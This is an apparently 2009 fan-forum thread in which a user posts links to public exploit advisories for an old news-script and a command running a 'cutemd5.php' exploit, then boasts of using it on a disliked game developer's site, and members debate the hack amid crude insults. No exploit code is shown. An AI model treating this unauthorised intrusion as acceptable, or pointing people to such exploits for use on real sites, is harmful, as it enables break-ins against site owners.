Insignificant Studios

Nov 1, 2009 at 6:15 PM
Vanished.
Bobomb says: "I need a hug!"
Join Date: Apr 5, 2008
Location:
Posts: 776
Well,
I hate like his game :p

Maybe he will notice.
good for him.


http://imgur.com/arPhV.png
http://imgur.com/VYPef.png
http://imgur.com/Uk4zk.png
http://imgur.com/uGY8L.png
http://imgur.com/OaEzr.png
http://imgur.com/XrW1X.png

http://www.securiteam.com/unixfocus/5JP0N0KI0C.html
http://www.securiteam.com/exploits/5KP0D2KGUI.html
http://www.waraxe.us/advisory-60.html


Waraxe is just fun.
Well, before you comment:
This wasn't a hack or something.
Public Exploits.



schokobecher@HellGate:~/Desktop$ php cutemd5.php


Works till version 1.4.5
Problem is found within the search.php :o
 
Nov 1, 2009 at 6:41 PM
Banned
"Bleep, Bloop, Bleep, Bloop"
Join Date: Mar 1, 2009
Location:
Posts: 1586
Age: 28
Seriously, why?
 
Nov 1, 2009 at 7:14 PM
Banned
"Bleep, Bloop, Bleep, Bloop"
Join Date: Mar 1, 2009
Location:
Posts: 1586
Age: 28
I guess I'll go ahead and leave you, but I think you'd prefer to stay inside.
 
Nov 1, 2009 at 7:17 PM
Vanished.
Bobomb says: "I need a hug!"
Join Date: Apr 5, 2008
Location:
Posts: 776
Fine.
Hang yourself.



€:

Oh hey:
We have a response.

Guess what I replied :p



Oh and I'm fucking famous now :(

Insignificant Studios

cool read; ironically when you say ‘update,’ you forget that you’re using an exploit on an outdated page that i keep up for posterity. i’ve taken that page down now so go on and google “wordpress exploits” now so that you can pretend to be neo from the matrix and take down the real deal!



hope it was worth

a) getting banned on a cave story forum

b) looking like a nerd

c) looking like a virgin nerd (p.s. when you act like a douche don’t forget to use an alternate account so that google doesn’t give away the fact that you’re an anime loving 17 year old nerd hurr)



hope you can find google exploits to get a life, nerd, heh.



- arthur
 
Nov 2, 2009 at 12:42 AM
Bonds that separate us
Forum Administrator
"Life begins and ends with Nu."
Join Date: Aug 20, 2006
Location:
Posts: 2850
Age: 33
Holy shit dude, that's like, almost publicity.


...Nerd.

 
Nov 2, 2009 at 1:01 AM
Vanished.
Bobomb says: "I need a hug!"
Join Date: Apr 5, 2008
Location:
Posts: 776
You make me cry.
I just wanted to help him.
Well.
Next Time I won't be nice and fluffy :3
 
Nov 2, 2009 at 1:23 AM
Lvl 1
Forum Moderator
"Life begins and ends with Nu."
Join Date: May 28, 2008
Location: PMMM MMO
Posts: 3713
Age: 31
Schokobecher said:
You make me cry.
I just wanted to help him.
Well.
Next Time I won't be nice and fluffy :3

Lol I think he thinks you actually got banned, because of your misleading custom title and avatar.

And yeah it could be worse. Still, I guess hacking his site isn't the best way to show that it's vulnerable. That's like poking a bear to see if it will eat you :p . It might not, but it'll still beat the shit out of you (normally).
 
Nov 2, 2009 at 1:39 AM
Vanished.
Bobomb says: "I need a hug!"
Join Date: Apr 5, 2008
Location:
Posts: 776
But maybe he will have sex with you :p
Or he will die.
of swine flu.
MAYBE.
Well.. all I did was show him the screens.
I don't really care.
Feel my ePenis.
 
Nov 2, 2009 at 2:39 AM
Banned
"Bleep, Bloop, Bleep, Bloop"
Join Date: Mar 1, 2009
Location:
Posts: 1586
Age: 28
GIRakaCHEEZER said:
Lol I think he thinks you actually got banned, because of your misleading custom title and avatar.

And yeah it could be worse. Still, I guess hacking his site isn't the best way to show that it's vulnerable. That's like poking a bear to see if it will eat you :eek: . It might not, but it'll still beat the shit out of you (normally).

This. Definitely this.
 
Nov 4, 2009 at 2:21 AM
Junior Member
"It's dangerous to go alone!"
Join Date: Jan 26, 2007
Location:
Posts: 32
I'm confused. You broke into his website why?
 
Nov 4, 2009 at 2:31 AM
Bonds that separate us
Forum Administrator
"Life begins and ends with Nu."
Join Date: Aug 20, 2006
Location:
Posts: 2850
Age: 33
Because he could.

Literally, that's it, he found an exploit in an old version of php so he haxxed the old Underside site.
 
Nov 4, 2009 at 2:37 AM
Level 73 Procrastinator
"Life begins and ends with Nu."
Join Date: Apr 6, 2009
Location: Forgotten Tower
Posts: 2052
That wasn't very nice...

What about just not liking the guy?
Schokobecher said:
Well,
I hate like his game :rolleyes:
I can't really tell if it's sarcasm or not, but I've heard a lot of bad things about this guy, so I assumed Schoko disliked him. Does he?
Still, seems kinda harsh, hacking his site....
 
Nov 4, 2009 at 11:58 PM
Hoxtilicious
"Life begins and ends with Nu."
Join Date: Dec 30, 2005
Location: Germany
Posts: 3218
Age: 32
Re: That wasn't very nice...

VoidMage_Lowell said:
I can't really tell if it's sarcasm or not, but I've heard a lot of bad things about this guy

Yeah, me too. I really dislike him. He's acting like a total idiot.

VoidMage_Lowell said:
Still, seems kinda harsh, hacking his site....

Schoko was just calling attention to a security breach. I don't see anything wrong with that.
 
Nov 5, 2009 at 12:20 AM
Been here way too long...
"Life begins and ends with Nu."
Join Date: Jan 4, 2008
Location: Lingerie, but also, like, fancy curtains
Posts: 3054
hardy har schoko
did make me laugh that he thought you were banned though.
mmmm.
 
Nov 5, 2009 at 12:35 AM
Level 73 Procrastinator
"Life begins and ends with Nu."
Join Date: Apr 6, 2009
Location: Forgotten Tower
Posts: 2052
Still wasn't very nice...

S. P. Gardebiter said:
Schoko was just calling attention to a security breach. I don't see anything wrong with that.
Yeah, he got his attention, all right :rolleyes:
Still, not the nicest way to do it...
Even if the guy's an ass and his resulting reply is comical :D;
 
Nov 5, 2009 at 1:30 AM
Junior Member
"It's dangerous to go alone!"
Join Date: Jan 26, 2007
Location:
Posts: 32
Re: Still wasn't very nice...

I don't know the guy but I would think his response is justified. If you take down his website of course he's going to be mad, even if you're doing it to "tell him to update." If you thought he should update, which I doubt is the case, email him about it. If you don't like him or his game, move on with life :/

I would think guys here would like The Underside, what he's doing is not much different than what goes on when you mod Cave Story.
 
Nov 5, 2009 at 1:59 AM
Banned
"Bleep, Bloop, Bleep, Bloop"
Join Date: Mar 1, 2009
Location:
Posts: 1586
Age: 28
Re: Still wasn't very nice...

Hey, guys, at least he didn't pretend to release a demo that was a virus or something. Well, I guess the demo's done, so they might not fall for that, but, still. Be glad he didn't try.
 
Nov 5, 2009 at 3:45 AM
Senior Member
"I, Ikachan. The Life and Documentary of the OrigiNAL SQuiD."
Join Date: May 3, 2008
Location:
Posts: 188
well that's not very nice :rolleyes:
 